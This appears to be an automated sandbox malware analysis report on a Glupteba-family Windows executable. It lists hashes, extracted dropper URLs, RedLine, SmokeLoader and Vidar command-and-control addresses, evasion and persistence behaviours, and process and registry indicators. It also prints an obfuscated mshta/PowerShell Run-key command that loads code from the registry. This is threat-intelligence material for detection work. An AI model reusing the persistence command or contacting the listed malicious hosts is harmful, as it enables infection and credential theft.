glupteba | 6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129

Analysis

max time kernel
125s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
10-03-2022 03:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe
Size

8.0MB
MD5

fd975bfab3accade3dd4acc43de5a767
SHA1

a9bb400fdfe57f6d4a1d0b7d07ea30aeb2b2182c
SHA256

6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129
SHA512

0bc57624867c7b6428962872b262efdfbaa023f603cbbfb941487a92793071f9ae4e6883df4b2ffe9af757e0a5c18bcb454ec6c98fe2eaf92667e5d49c7c1ff3

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

fdfsdf

86.107.197.196:63065

Attributes

auth_value
49c341b88f13528ba52befa3c6ca7ebb

Extracted

Family

redline

Botnet

Travis

5.182.5.22:33809

Attributes

auth_value
6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

redline

Botnet

jack

5.182.5.203:33873

Attributes

auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

vidar

Version

50.6

Botnet

937

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes

profile_id
937

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1488-190-0x00000000052D0000-0x0000000005BF6000-memory.dmp	family_glupteba
behavioral2/memory/1488-191-0x0000000000400000-0x000000000309E000-memory.dmp	family_glupteba
behavioral2/memory/4348-227-0x0000000005190000-0x0000000005AB6000-memory.dmp	family_glupteba
behavioral2/memory/4348-228-0x0000000000400000-0x000000000309E000-memory.dmp	family_glupteba
behavioral2/memory/4496-232-0x0000000000400000-0x000000000309E000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2440 3052 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2440	3052	rUNdlL32.eXe

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\9c5MAwlbt0rDJKWOzi7BfqsH.exe	family_redline
behavioral2/memory/5060-298-0x0000000000DF0000-0x0000000001011000-memory.dmp	family_redline
behavioral2/memory/2388-297-0x00000000002B0000-0x00000000002D0000-memory.dmp	family_redline
behavioral2/memory/4900-296-0x0000000000B30000-0x0000000000D53000-memory.dmp	family_redline
behavioral2/memory/5060-273-0x0000000000DF0000-0x0000000001011000-memory.dmp	family_redline
behavioral2/memory/4900-269-0x0000000000B30000-0x0000000000D53000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4144-266-0x0000000000630000-0x0000000000674000-memory.dmp	family_onlylogger
behavioral2/memory/4144-267-0x0000000000400000-0x0000000000492000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/3700-291-0x0000000004A80000-0x0000000004B2C000-memory.dmp	family_vidar
behavioral2/memory/3700-302-0x0000000000400000-0x0000000002EEE000-memory.dmp	family_vidar

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

318 5232 powershell.exe
319 5296 powershell.exe
320 4596 powershell.exe
327 5296 powershell.exe
Downloads MZ/PE file

flow	pid	process
318	5232	powershell.exe
319	5296	powershell.exe
320	4596	powershell.exe
327	5296	powershell.exe

Executes dropped EXE 40 IoCs

Processes:

Files.exeKRSetp.exejfiag3g_gg.exeInstall.exeFolder.exeFolder.exeInfo.exeInstallation.exepub2.exemysetold.exemd9_1sjm.exeComplete.exeCompPkgSrv.exeInfo.execsrss.exeinjector.exeConhost.exeO3bWtVFAnzUgWoGX7TAzOKBX.exeBprzbeVD2JV25BkESLpHQ0FM.exePtbxSfCYb6Ada5yumE1Czrh1.exemSHdbLm88ZC3sOz0MsHb_390.exe_mYP_tSnTOgnjgNLP3W4DIHR.exefnH4cP5IPLpAsOqwykBYFrXU.exei5Qt8Tg4QjEJubcKoI5wjaIA.exe9c5MAwlbt0rDJKWOzi7BfqsH.exepJglbkrSsOdYPwGyoMpuG8tW.exezXdDEVf7mamOqjSI5Tpcby_y.exelzticJq7_775LC6cTkVFZRk4.exeyan6zjgcFq6Syhr4zEseTjOJ.exeWerFault.exef6NbhqzbGjqSK_FWGRvOtGn6.exe2MGmqKtaWVQvR_aWmj3MdgZe.exeiHngxU3cVgjssPChkVvEa8FV.exeJYqtKZ9VMR9QWrhO3BJTfa5q.exeInstall.exeTgzysDkCy5GzQg9Jd0abQkvR.exeInstall.exe011a79fd-fbf8-4f1c-a47e-6b7a3f90d523.exei5Qt8Tg4QjEJubcKoI5wjaIA.exeAccostarmi.exe.pif

pid	process
2472	Files.exe
3728	KRSetp.exe
2948	jfiag3g_gg.exe
3416	Install.exe
3560	Folder.exe
748	Folder.exe
1488	Info.exe
1188	Installation.exe
3688	pub2.exe
1668	mysetold.exe
2016	md9_1sjm.exe
3284	Complete.exe
3068	CompPkgSrv.exe
4348	Info.exe
4496	csrss.exe
336	injector.exe
2944	Conhost.exe
3700	O3bWtVFAnzUgWoGX7TAzOKBX.exe
4100	BprzbeVD2JV25BkESLpHQ0FM.exe
4144	PtbxSfCYb6Ada5yumE1Czrh1.exe
3540	mSHdbLm88ZC3sOz0MsHb_390.exe
5036	_mYP_tSnTOgnjgNLP3W4DIHR.exe
5028	fnH4cP5IPLpAsOqwykBYFrXU.exe
4296	i5Qt8Tg4QjEJubcKoI5wjaIA.exe
2388	9c5MAwlbt0rDJKWOzi7BfqsH.exe
5060	pJglbkrSsOdYPwGyoMpuG8tW.exe
4900	zXdDEVf7mamOqjSI5Tpcby_y.exe
1820	lzticJq7_775LC6cTkVFZRk4.exe
3776	yan6zjgcFq6Syhr4zEseTjOJ.exe
3728	WerFault.exe
2140	f6NbhqzbGjqSK_FWGRvOtGn6.exe
4340	2MGmqKtaWVQvR_aWmj3MdgZe.exe
868	iHngxU3cVgjssPChkVvEa8FV.exe
1556	JYqtKZ9VMR9QWrhO3BJTfa5q.exe
3408	Install.exe
5224	TgzysDkCy5GzQg9Jd0abQkvR.exe
5588	Install.exe
5832	011a79fd-fbf8-4f1c-a47e-6b7a3f90d523.exe
5932	i5Qt8Tg4QjEJubcKoI5wjaIA.exe
4952	Accostarmi.exe.pif

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\BprzbeVD2JV25BkESLpHQ0FM.exe	upx
C:\Users\Admin\Documents\BprzbeVD2JV25BkESLpHQ0FM.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/2016-164-0x0000000000400000-0x000000000060D000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2MGmqKtaWVQvR_aWmj3MdgZe.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2MGmqKtaWVQvR_aWmj3MdgZe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2MGmqKtaWVQvR_aWmj3MdgZe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

O3bWtVFAnzUgWoGX7TAzOKBX.exe6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exeFolder.exeComplete.exe_mYP_tSnTOgnjgNLP3W4DIHR.exemSHdbLm88ZC3sOz0MsHb_390.exeInstallation.exeInstall.exePtbxSfCYb6Ada5yumE1Czrh1.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	O3bWtVFAnzUgWoGX7TAzOKBX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	6a18480e49c504bf667dcf26872a297d732bd6b29d5ecdd61f717b8a63f36129.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Complete.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	_mYP_tSnTOgnjgNLP3W4DIHR.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	mSHdbLm88ZC3sOz0MsHb_390.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Installation.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	PtbxSfCYb6Ada5yumE1Czrh1.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exeO3bWtVFAnzUgWoGX7TAzOKBX.exe

pid process

2092 rundll32.exe
3700 O3bWtVFAnzUgWoGX7TAzOKBX.exe
3700 O3bWtVFAnzUgWoGX7TAzOKBX.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2092	rundll32.exe
3700	O3bWtVFAnzUgWoGX7TAzOKBX.exe
3700	O3bWtVFAnzUgWoGX7TAzOKBX.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4340-285-0x00007FF778B10000-0x00007FF7790BE000-memory.dmp	themida
behavioral2/memory/4340-286-0x00007FF778B10000-0x00007FF7790BE000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exemsedge.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QuietField = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

md9_1sjm.exe2MGmqKtaWVQvR_aWmj3MdgZe.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2MGmqKtaWVQvR_aWmj3MdgZe.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

182 ipinfo.io
183 ipinfo.io
326 ipinfo.io
13 ip-api.com
31 ipinfo.io
32 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
182	ipinfo.io
183	ipinfo.io
326	ipinfo.io
13	ip-api.com
31	ipinfo.io
32	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\mysetold.exe	autoit_exe

Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

pJglbkrSsOdYPwGyoMpuG8tW.exezXdDEVf7mamOqjSI5Tpcby_y.exe

pid process

5060 pJglbkrSsOdYPwGyoMpuG8tW.exe
4900 zXdDEVf7mamOqjSI5Tpcby_y.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
5060	pJglbkrSsOdYPwGyoMpuG8tW.exe
4900	zXdDEVf7mamOqjSI5Tpcby_y.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

i5Qt8Tg4QjEJubcKoI5wjaIA.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4296 set thread context of 5932	4296	i5Qt8Tg4QjEJubcKoI5wjaIA.exe	i5Qt8Tg4QjEJubcKoI5wjaIA.exe
PID 4596 set thread context of 5404	4596	powershell.exe	RegAsm.exe
PID 5232 set thread context of 6024	5232	powershell.exe	RegSvcs.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\5f3b24b1-0053-4305-bf5e-52b7fd2c859b.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310042824.pma	setup.exe

Drops file in Windows directory 3 IoCs

Processes:

Info.exeschtasks.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Info.exe
File created	C:\Windows\rss\csrss.exe	Info.exe
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2900	2092	WerFault.exe	rundll32.exe
4776	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
4728	2140	WerFault.exe
4660	1820	WerFault.exe
4816	2944	WerFault.exe
5652	2140	WerFault.exe	f6NbhqzbGjqSK_FWGRvOtGn6.exe
5704	1820	WerFault.exe	lzticJq7_775LC6cTkVFZRk4.exe
5728	2944	WerFault.exe	HXa9ThBMsSu04vgU7n8y0hWn.exe
5776	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
6060	1188	WerFault.exe	Installation.exe
5024	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
3728	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
5512	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
5700	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
2512	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
3708	4144	WerFault.exe	PtbxSfCYb6Ada5yumE1Czrh1.exe
4864	6024	WerFault.exe	RegSvcs.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeO3bWtVFAnzUgWoGX7TAzOKBX.exe011a79fd-fbf8-4f1c-a47e-6b7a3f90d523.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	O3bWtVFAnzUgWoGX7TAzOKBX.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	O3bWtVFAnzUgWoGX7TAzOKBX.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	011a79fd-fbf8-4f1c-a47e-6b7a3f90d523.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	011a79fd-fbf8-4f1c-a47e-6b7a3f90d523.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4304 schtasks.exe
4992 schtasks.exe
5780 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4936 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

4948 tasklist.exe
5148 tasklist.exe

pid	process
4304	schtasks.exe
4992	schtasks.exe
5780	schtasks.exe

pid	process
4936	timeout.exe

pid	process
4948	tasklist.exe
5148	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3556 taskkill.exe
4936 taskkill.exe
1844 taskkill.exe
3784 taskkill.exe

pid	process
3556	taskkill.exe
4936	taskkill.exe
1844	taskkill.exe
3784	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Info.exe
